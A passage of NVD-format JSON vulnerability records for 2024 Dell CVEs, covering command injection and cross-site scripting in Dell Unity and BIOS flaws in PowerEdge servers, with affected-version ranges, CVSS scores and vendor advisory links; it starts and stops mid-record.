"CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:dell:unity_operating_environment:*:*:*:*:*:*:*:*", "versionEndExcluding" : "5.4.0.0.5.094", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-02-12T19:15Z", "lastModifiedDate" : "2024-11-21T08:45Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0166", "ASSIGNER" : "secure@dell.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-78" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities", "name" : "https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities", "name" : "https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "\nDell Unity, versions prior to 5.4, contains an OS Command Injection Vulnerability in its svc_tcpdump utility. An authenticated attacker could potentially exploit this vulnerability, leading to the execution of arbitrary OS commands with elevated privileges.\n\n" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:dell:unity_operating_environment:*:*:*:*:*:*:*:*", "versionEndExcluding" : "5.4.0.0.5.094", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-02-12T19:15Z", "lastModifiedDate" : "2025-05-06T21:16Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0167", "ASSIGNER" : "secure@dell.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-78" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities", "name" : "https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities", "name" : "https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "\nDell Unity, versions prior to 5.4, contains an OS Command Injection Vulnerability in the svc_topstats utility. An authenticated attacker could potentially exploit this vulnerability, leading to the ability to overwrite arbitrary files on the file system with root privileges.\n\n" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:dell:unity_operating_environment:*:*:*:*:*:*:*:*", "versionEndExcluding" : "5.4.0.0.5.094", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-02-12T19:15Z", "lastModifiedDate" : "2024-11-21T08:45Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0168", "ASSIGNER" : "secure@dell.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-78" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities", "name" : "https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities", "name" : "https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "\nDell Unity, versions prior to 5.4, contains a Command Injection Vulnerability in svc_oscheck utility. An authenticated attacker could potentially exploit this vulnerability, leading to the ability to inject arbitrary operating system commands. This vulnerability allows an authenticated attacker to execute commands with root privileges.\n\n" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:dell:unity_operating_environment:*:*:*:*:*:*:*:*", "versionEndExcluding" : "5.4.0.0.5.094", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-02-12T19:15Z", "lastModifiedDate" : "2024-11-21T08:45Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0169", "ASSIGNER" : "secure@dell.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities", "name" : "https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities", "name" : "https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Dell Unity, version(s) 5.3 and prior, contain(s) an Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to Information exposure." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:dell:unity_operating_environment:*:*:*:*:*:*:*:*", "versionEndExcluding" : "5.4.0.0.5.094", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-02-12T19:15Z", "lastModifiedDate" : "2024-11-21T08:45Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0170", "ASSIGNER" : "secure@dell.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-78" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities", "name" : "https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities", "name" : "https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "\nDell Unity, versions prior to 5.4, contains an OS Command Injection Vulnerability in its svc_cava utility. An authenticated attacker could potentially exploit this vulnerability, escaping the restricted shell and execute arbitrary operating system commands with root privileges.\n\n" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:dell:unity_operating_environment:*:*:*:*:*:*:*:*", "versionEndExcluding" : "5.4.0.0.5.094", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-02-12T19:15Z", "lastModifiedDate" : "2024-11-21T08:45Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0171", "ASSIGNER" : "secure@dell.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-367" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.dell.com/support/kbdoc/en-us/000226253/dsa-2024-039-security-update-for-dell-amd-based-poweredge-server-vulnerability", "name" : "https://www.dell.com/support/kbdoc/en-us/000226253/dsa-2024-039-security-update-for-dell-amd-based-poweredge-server-vulnerability", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://www.dell.com/support/kbdoc/en-us/000226253/dsa-2024-039-security-update-for-dell-amd-based-poweredge-server-vulnerability", "name" : "https://www.dell.com/support/kbdoc/en-us/000226253/dsa-2024-039-security-update-for-dell-amd-based-poweredge-server-vulnerability", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Dell PowerEdge Server BIOS contains an TOCTOU race condition vulnerability. A local low privileged attacker could potentially exploit this vulnerability to gain access to otherwise unauthorized resources." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r6615_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.8.3", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r6615:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r7615_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.8.3", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r7615:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r6625_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.8.3", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r6625:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r7625_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.8.3", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r7625:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_c6615_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.3.3", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_c6615:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:xc_core_xc7625_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.8.3", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:xc_core_xc7625:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:L", "attackVector" : "LOCAL", "attackComplexity" : "HIGH", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "LOW", "baseScore" : 5.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.1, "impactScore" : 3.7 } }, "publishedDate" : "2024-06-25T16:15Z", "lastModifiedDate" : "2024-11-21T08:45Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0172", "ASSIGNER" : "secure@dell.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.dell.com/support/kbdoc/en-us/000223727/dsa-2024-035-security-update-for-dell-poweredge-server-bios-for-an-improper-privilege-management-security-vulnerability", "name" : "https://www.dell.com/support/kbdoc/en-us/000223727/dsa-2024-035-security-update-for-dell-poweredge-server-bios-for-an-improper-privilege-management-security-vulnerability", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://www.dell.com/support/kbdoc/en-us/000223727/dsa-2024-035-security-update-for-dell-poweredge-server-bios-for-an-improper-privilege-management-security-vulnerability", "name" : "https://www.dell.com/support/kbdoc/en-us/000223727/dsa-2024-035-security-update-for-dell-poweredge-server-bios-for-an-improper-privilege-management-security-vulnerability", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Dell PowerEdge Server BIOS and Dell Precision Rack BIOS contain an improper privilege management security vulnerability. An unauthenticated local attacker could potentially exploit this vulnerability, leading to privilege escalation." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r660_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.5.6", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r660:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r760_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.5.6", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r760:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_c6620_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.5.6", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_c6620:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_mx760c_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.5.6", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_mx760c:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r860_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.5.6", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r860:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r960_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.5.6", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r960:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_hs5610_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.5.6", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_hs5610:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_hs5620_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.5.6", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_hs5620:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r660xs_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.5.6", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r660xs:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r760xs_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.5.6", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r760xs:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r760xd2_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.5.6", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r760xd2:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_t560_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.5.6", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_t560:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r760xa_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.1.3", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r760xa:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xe9680_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.1.3", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xe9680:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xr5610_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.1.4", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xr5610:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xr8610t_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.1.3", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xr8610t:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xr8620t_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.1.3", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xr8620t:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xr7620_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.5.6", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xr7620:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xe8640_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.2.5", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xe8640:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xe9640_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.3.6", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xe9640:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r6615_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.4.6", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : 